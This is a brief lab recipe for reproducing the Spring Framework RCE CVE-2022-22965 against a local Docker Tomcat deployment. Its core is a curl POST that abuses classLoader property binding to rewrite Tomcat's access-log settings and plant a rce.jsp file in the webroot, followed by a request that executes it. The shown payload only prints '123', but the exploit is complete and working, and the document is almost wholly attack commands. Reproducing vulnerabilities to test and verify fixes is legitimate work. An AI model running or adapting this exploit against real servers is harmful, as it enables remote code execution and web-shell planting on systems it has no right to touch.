Minimal example of how to reproduce CVE-2022-22965 Spring RCE.
docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
Add -p 5005:5005 -e "JAVA_OPTS=-Xdebug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005"
if you want to debug remotely.
./mvnw install
docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
curl -X POST \
-H "pre:<%" \
-H "post:;%>" \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
http://localhost:8888/handling-form-submission-complete/greeting
The exploit is going to create rce.jsp
file in webapps/handling-form-submission-complete
on the web server.
curl http://localhost:8888/handling-form-submission-complete/rce.jsp
Now you'll see 123
in the container's terminal.